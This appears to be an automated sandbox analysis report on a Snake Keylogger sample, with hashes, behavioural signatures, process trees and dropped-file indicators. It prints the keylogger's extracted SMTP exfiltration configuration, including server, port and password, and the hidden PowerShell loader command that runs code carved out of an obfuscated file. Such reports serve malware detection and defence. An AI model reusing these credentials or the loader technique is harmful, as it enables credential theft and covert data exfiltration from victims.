Analysis
-
max time kernel
146s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
16-11-2024 20:19
Static task
static1
Behavioral task
behavioral1
Sample
eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Citicorp.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Citicorp.ps1
Resource
win10v2004-20241007-en
General
-
Target
eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe
-
Size
762KB
-
MD5
4398a15085a3837ef2ef6a7b056643c6
-
SHA1
d15e71d5e8e9b750d429c7602d98e7203c24543b
-
SHA256
eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995
-
SHA512
34b5b0b7299c325a525675c8a0cc9e4cd6ce724866530bba7933c783c87d73f477297e8d865af6836926e5cf579292f4ce385f2c2c8ce89f916199d048a8dafe
-
SSDEEP
12288:8PG/hGy3E/kipG6IhwYz0BWIbyuwQL3OWntl81tTTZ/Oi5DwFyEionDud:QGhbYpGjhwYzO5yRQLvf81BV2m6ionDE
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
smtp.securemail.pro - Port:
587 - Username:
[email protected] - Password:
jrpM0Y5k - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral2/memory/116-91-0x0000000000600000-0x0000000001854000-memory.dmp family_snakekeylogger behavioral2/memory/116-92-0x0000000000600000-0x0000000000626000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3188 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 7 IoCs
flow pid Process 28 116 msiexec.exe 30 116 msiexec.exe 32 116 msiexec.exe 34 116 msiexec.exe 38 116 msiexec.exe 47 116 msiexec.exe 49 116 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 27 drive.google.com 28 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 46 checkip.dyndns.org -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\folkepensionsaldres\frostbiter.ini eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 116 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3188 powershell.exe 116 msiexec.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Levitters.lnk eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe File opened for modification C:\Windows\Levitters.lnk eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3188 powershell.exe 3188 powershell.exe 3188 powershell.exe 3188 powershell.exe 3188 powershell.exe 3188 powershell.exe 3188 powershell.exe 3188 powershell.exe 3188 powershell.exe 116 msiexec.exe 116 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3188 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3188 powershell.exe Token: SeIncreaseQuotaPrivilege 3188 powershell.exe Token: SeSecurityPrivilege 3188 powershell.exe Token: SeTakeOwnershipPrivilege 3188 powershell.exe Token: SeLoadDriverPrivilege 3188 powershell.exe Token: SeSystemProfilePrivilege 3188 powershell.exe Token: SeSystemtimePrivilege 3188 powershell.exe Token: SeProfSingleProcessPrivilege 3188 powershell.exe Token: SeIncBasePriorityPrivilege 3188 powershell.exe Token: SeCreatePagefilePrivilege 3188 powershell.exe Token: SeBackupPrivilege 3188 powershell.exe Token: SeRestorePrivilege 3188 powershell.exe Token: SeShutdownPrivilege 3188 powershell.exe Token: SeDebugPrivilege 3188 powershell.exe Token: SeSystemEnvironmentPrivilege 3188 powershell.exe Token: SeRemoteShutdownPrivilege 3188 powershell.exe Token: SeUndockPrivilege 3188 powershell.exe Token: SeManageVolumePrivilege 3188 powershell.exe Token: 33 3188 powershell.exe Token: 34 3188 powershell.exe Token: 35 3188 powershell.exe Token: 36 3188 powershell.exe Token: SeDebugPrivilege 116 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3604 wrote to memory of 3188 3604 eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe 85 PID 3604 wrote to memory of 3188 3604 eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe 85 PID 3604 wrote to memory of 3188 3604 eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe 85 PID 3188 wrote to memory of 116 3188 powershell.exe 96 PID 3188 wrote to memory of 116 3188 powershell.exe 96 PID 3188 wrote to memory of 116 3188 powershell.exe 96 PID 3188 wrote to memory of 116 3188 powershell.exe 96 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe"C:\Users\Admin\AppData\Local\Temp\eeb19ccec86a82f4ebbe4512ebadca5089bc192478a356a99824a89b1f122995.exe"1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Notifiers73=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\Stragglier\Citicorp.Amf';$Superscribing=$Notifiers73.SubString(53509,3);.$Superscribing($Notifiers73)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:116
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
52KB
MD550a86de35927f45ce009f37494068b0d
SHA1880c888d5e156d7080395c964614872fe42ac89d
SHA256ff7d67d9d4613f0716febf78a0e813953862c77bb5f084eebf881ac02809984b
SHA512230f60733ee595111e91b0bb9c99a5a4c72b5ebfb1b77ff544b5aadeff5179fccfcd473fa8caa290798d6558f753663d21f966a6db9b2193d15e81adef6159d6
-
Filesize
303KB
MD59a6846335f888bd98b7a3439944f4861
SHA16a560953e0c1a73e0c7ad8b70787337fc77c44c9
SHA25625d465d3c7065ed206fc060a68aafb67ca1c7458ab59aa027c4d5b3882ddd0e8
SHA5129da8b9c39564b62250fb3db160ec4605deb7d384813953f3ecf63586f065704528e54d47d09fe7e962650112188e3b4fb7d5cf33f620d3ec84510bc94fef15ff
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82